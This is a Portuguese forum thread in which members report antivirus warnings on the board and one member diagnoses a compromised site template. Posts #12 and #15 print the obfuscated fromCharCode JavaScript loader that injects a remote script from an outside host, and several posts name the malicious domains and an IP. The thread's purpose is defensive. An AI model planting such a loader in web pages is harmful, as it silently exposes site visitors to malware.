Announcement

Collapse
No announcement yet.

Aviso antivirus!

Collapse
X
Collapse
 
  • Página de 7
  • Filtrar
  • Time
  • Mostrar
Clear All
new posts
Anterior 1 2 3 4 7 template Próximo
  • #1

    Aviso antivirus!

    Ora viva,
    aos mais entendidos na matéria, acontece faz alguns dias que sempre que estou a consultar aqui no fórum, está sistematicamente a abrir uma janela do Avast a informar que bloqueou URL

    "Objeto:http://directmarketinggtrade.in/in.cgi?walter"

    penso que possa ser algum ficheiro que esteja aqui no fórum infetado...

    Acontece isto com mais alguém?
    Abraço
    Tags: Nenhuma
  • #2
    Eu acho é que o problema é da tua máquina... eu acedo ao fórum a partir de vários pc's todos eles com anti-virus de vários fabricantes e nenhum se queixa de erros ao aceder ao fórum.

    Comentar

    • #3
      Originally posted by SEDAN View Post
      Ora viva,
      aos mais entendidos na matéria, acontece faz alguns dias que sempre que estou a consultar aqui no fórum, está sistematicamente a abrir uma janela do Avast a informar que bloqueou URL

      "Objeto:http://directmarketinggtrade.in/in.cgi?walter"

      penso que possa ser algum ficheiro que esteja aqui no fórum infetado...

      Acontece isto com mais alguém?
      Abraço
      Ontem a mim aconteceu-me algo semelhante, mas a firewall informou que o computador estava a ser atacado e chegou para a situação.

      Comentar

      • #4
        Aconteceu ontem a noite a minha mulher a mesma coisa, ao fazer ou login ou logout. No meu caso foi o AVG que detectou.

        Comentar

        • #5
          Épa, então sou eu que tenho máquinas boas e nenhuma se queixa! :lol

          Comentar

          • #6
            Originally posted by JustaPor View Post
            Épa, então sou eu que tenho máquinas boas e nenhuma se queixa! :lol
            Neste caso não será as maquinas boas, mas sim os nossos antivírus que são bons, e bloqueiam logo uma possível ameaça de infeção, tenho ativo também o Malwarebytes Anti-Malware e já bloqueou algumas vezes também, e só está a acontecer aqui no forum, portanto acho que se deveria ter uma especial atenção a este assunto :fixe

            Comentar

            • #7
              Comigo acontece-me o mesmo...

              Comentar

              • #8
                Originally posted by JustaPor View Post
                Épa, então sou eu que tenho máquinas boas e nenhuma se queixa! :lol
                No pc do trabalho também não me dá nenhum aviso. É também o AVG, só que o Business Edition.

                São uns esquisitos estes pc's de hoje em dia, não deixam passar nada, que chatos.

                Comentar

                • #9
                  O meu é o Avast.
                  Já tive o Nod32, o Kaspersky e o AVG, e nenhum deles se queixava.
                  Não sei se será uma questão recente, daí os outros nada terem encontrado...

                  Comentar

                  • #10
                    Consegui decifrar o IP (146.185.244.54), e após uma pequena pesquisa já li que é um site turco dedicado a este fim,e que está a atacar em vários fóruns a nível mundial...
                    Aconselho a terem sempre o vosso antivírus atualizado diariamente...
                    Abraços

                    ---------- Mensagem adicionada em 04:44 PM ---------- Mensagem anterior em 04:39 PM ----------

                    E já agora, podem continuar a navegar aqui no fórum que não há perigo nenhum, desde que os antivírus façam o seu serviço que é bloquear, como me tem estado a acontecer...

                    Comentar

                    • #11
                      Porreiro :)

                      Comentar

                      • #12
                        Boas.
                        Acabei de bloquear a gama completa desse IP, mas nunca me deu nenhuma mensagem!

                        Encontrei algo relacionado na net, mas só afecta o Internet Explorer, como uso o Mozilla nunca apareceu nada!

                        ---------- Mensagem adicionada em 11:21 PM ---------- Mensagem anterior em 10:53 PM ----------

                        OK,

                        Acho que já dei com a bronca, a fonte do problema está em um código infectado e está localizado no interior de uma tabela referente a um template na base de dados
                        Deve-se fazer uma procura no phpMyAdmin no vBulletin_init na tabela dos templates e vão encontrar isto:

                        Code:

                        var script=document.createElement(String.fromCharCode( 115,99,114,105,112,116));script.src=String.fromCha rCode(104,116,116,112,58,47,47,105,109,97,103,101, 50,121,111,117,46,105,110,47,106,113,117,101,114,1 21,46,99,111,109,112,97,116,105,98,105,108,105,116 ,121,46,106,115);var head=document.getElementsByTagName(String.fromChar Code(104,101,97,100))[0];head.appendChild(script);
                        Este código inclui o redirecionamento. Se descodificar obten-se isto apartir do segundo fromCharCode() :

                        http://image2you.in/jquery.compatibility.js

                        Neste java ele carrega o iframe.src = 'http://directmarketingmanage.in/in.cgi?walter' no iframe. este código deve ser removido á mão para resolver o problema.

                        Esta ameaça e introduzida no MySQL atravéz de SQL INjection, este processo de provocar introdução nas base de dados on-line já existe há muito tempo.

                        haaa os meus velhos tempos de hacker!!!


                        ---------- Mensagem adicionada em 11:29 PM ---------- Mensagem anterior em 11:21 PM ----------

                        Aos utilizadores afectados devem verificar o host file para ver se foram adicionados nos link's ao mesmo:
                        No Xp o conteúdo do host deve ser o seguinte:
                        # Copyright (c) 1993-1999 Microsoft Corp.
                        #
                        # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
                        #
                        # This file contains the mappings of IP addresses to host names. Each
                        # entry should be kept on an individual line. The IP address should
                        # be placed in the first column followed by the corresponding host name.
                        # The IP address and the host name should be separated by at least one
                        # space.
                        #
                        # Additionally, comments (such as these) may be inserted on individual
                        # lines or following the machine name denoted by a '#' symbol.
                        #
                        # For example:
                        #
                        # 102.54.94.97 rhino.acme.com # source server
                        # 38.25.63.10 x.acme.com # x client host

                        127.0.0.1 localhost


                        Relativo aos outros sistemas operativos o ficheiro deve ser muito idêntico.


                        Comentar

                        • #13
                          Eu utilizo o google chrome, e também tenho esse problema...
                          Isso é possível fazer por quem percebe de informática na óptica do utilizador? 8O
                          É muito pedir te que faças um tutorial? :assobio

                          Comentar

                          • #14
                            Boas,

                            O meu PC pessoal também se queixa disso, e neste caso Uso o CHROME e o Avast, portanto e pelo que li não me parece que seja uma 'situação' de apenas algum utilizador.

                            Cumps

                            Comentar

                            • #15
                              Originally posted by kalu View Post
                              OK,
                              Acho que já dei com a bronca, a fonte do problema está em um código infectado e está localizado no interior de uma tabela referente a um template na base de dados
                              var script=document.createElement(String.fromCharCode( 115,99,114,105,112,116));script.src=String.fromCha rCode(104,116,116,112,58,47,47,105,109,97,103,101, 50,121,111,117,46,105,110,47,106,113,117,101,114,1 21,46,99,111,109,112,97,116,105,98,105,108,105,116 ,121,46,106,115);var head=document.getElementsByTagName(String.fromChar Code(104,101,97,100))[0];head.appendChild(script);
                              Este código inclui o redirecionamento. Se descodificar obten-se isto apartir do segundo fromCharCode() :

                              http://image2you.in/jquery.compatibility.js

                              Neste java ele carrega o iframe.src = 'http://directmarketingmanage.in/in.cgi?walter' no iframe. este código deve ser removido á mão para resolver o problema.
                              Não é o caso pois não existe nenhum jquery.compatibility a ser carregado. Mais, informo que os anti-virus é que andam malucos pois há dias também me informaram que o site da empresa estava com virus, pedi um report à pessoa, ele acedeu de novo e já não apareceu nenhum erro.

                              Comentar

                              Anterior 1 2 3 4 7 template Próximo
                              Em processamento...
                              X